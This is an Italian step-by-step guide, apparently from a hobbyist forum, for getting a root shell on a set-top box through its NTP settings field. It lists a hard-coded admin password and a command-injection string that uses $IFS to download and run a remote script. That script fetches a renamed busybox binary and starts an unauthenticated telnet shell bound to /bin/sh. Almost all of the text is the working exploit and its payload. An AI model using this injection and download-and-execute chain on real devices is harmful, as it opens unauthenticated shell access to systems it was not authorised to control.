NTP Exploit

• Impostare sul PC l'indirizzo IP 83.221.117.229
• Eseguire un server DHCP impostato per rilasciare indirizzi da 83.221.117.200 a 83.221.117.220
• Disattivare eventuali altri server DHCP
• Accendere il STB e attendere la fine del boot
• Aprire un browser alla pagina http://83.221.117.200:1980 (o qualunque altro indirizzo abbia preso il STB)
• Entrare con password t30d0r1c0
• Impostare nel campo relativo al server NTP la seguente stringa:

pool.ntp.org;$(cd$IFS/tmp;/usr/bin/wget$IFS\http://83.221.117.229/script.sh;/bin/sh$IFS/tmp/script.sh)

• Attivare un server HTTP sul proprio PC
• Preparare un file script.sh fatto così:

mount -t tmpfs -osize=2m tmpfs /mnt

cd /mnt
/usr/bin/wget http://83.221.117.229/telnetd
/bin/chmod 0777 /mnt/telnetd
/mnt/telnetd -l /bin/sh

• Copiare il file script.sh nella root directory del server web
• Prelevare busybox26 dal sito di lundman, rinominare il file busybox26 in telnetd e copiarlo nella root directory del server web
• Accendere il STB e attendere la fine del boot
• Utilizzare un client telnet per connettersi

Credits: Cyberstorm, Roleo su Ilpuntotecnicoeadsl Forum